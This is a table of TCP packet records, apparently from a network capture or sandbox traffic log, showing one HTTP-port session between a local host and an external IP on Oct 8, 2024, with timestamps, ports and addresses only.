Oct 8, 2024 20:47:32.800514936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800534964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800566912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800590992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800600052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800605059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800632954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800646067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800664902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800673008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800693989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800717115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800728083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800748110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800784111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800900936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800950050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800959110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.800982952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.800995111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801018000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801033974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801049948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801069021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801083088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801100969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801116943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801131964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801148891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801167965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801183939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801199913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801217079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801239014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801250935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801269054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801284075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801301956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801317930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801335096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801351070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801367044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801384926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801399946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801417112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801433086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801449060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801465988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801482916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801501036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801515102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801528931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801552057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801561117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801603079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801758051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801790953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801811934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801824093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801836014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801857948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801868916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801891088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801911116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801924944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801940918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801956892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.801976919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.801991940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802010059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802025080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802037954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802057028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802073002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802092075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802109003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802125931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802141905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802160978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802177906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802210093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802304983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802337885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802356005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802370071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802386999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802403927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802413940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802437067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802453041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802469015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802484989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802501917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802519083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802535057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802551031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802566051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802583933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802596092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802613974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802628994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802644968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802661896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802679062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802697897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802712917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802748919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802876949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802927017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802932024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802958965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.802973032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.802992105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803008080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803025007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803041935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803057909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803078890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803091049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803107023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803123951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803139925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803157091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803173065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803189039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803206921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803222895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803239107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803256035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803275108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803289890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803306103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803333044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803349018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803365946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803378105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803415060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803421021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803450108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803459883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803486109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803497076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803519011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803539038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803554058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803570986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803586960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803603888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803621054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803638935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803656101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803668022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803689003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.803708076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.803738117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886663914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886674881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886684895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886759996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886771917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886780977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886794090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886859894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886859894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886861086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886874914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.886904955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886913061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.886986971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887020111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887053013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887073994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887085915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887101889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887120962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887151003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887159109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887172937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887208939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887211084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887240887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887259960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887296915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887521029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887553930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887605906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887607098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887639046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887658119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887671947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887686968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887706995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887723923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887754917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887762070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887790918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887813091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887840033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887842894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887878895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887892008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887912035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887928963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887944937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.887963057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.887991905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888006926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888029099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888041973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888062000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888068914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888094902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888113976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888123989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888144016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888156891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888170958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888190985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888211966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888227940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888242960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888278008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888535976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888567924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888592005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888602018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888611078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.888629913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.888679028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889117002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889151096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889168024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889183998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889194965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889235973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889250994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889283895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889306068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889317036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889328957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889350891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889362097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889383078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889395952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889426947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889477015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889513969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889549971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889559031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889581919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889615059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889648914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889668941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889683008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889698029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889717102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889729023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889763117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889801025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889832973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889853001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889868021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889878988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889914036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889920950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889954090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.889967918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.889987946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890001059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890021086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890033960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890054941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890059948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890100002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890136957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890171051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890188932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890209913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890209913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890245914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890259027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890280008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890297890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890312910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.890325069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.890356064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891020060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891052008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891083956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891089916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891097069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891143084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891175985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891199112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891210079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891227007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891242981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891290903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891318083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891350985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891366005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891396999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891400099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891434908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891450882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891467094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891479969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891503096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891509056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891535997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891550064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891571045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891583920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891601086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.891619921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.891640902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892241001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892272949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892296076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892317057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892326117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892359972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892374992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892405033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892411947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892443895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892456055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892477989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892487049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892509937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.892524004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892555952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.892563105 CEST	80	49755	95.164.90.97	192.168.2.5
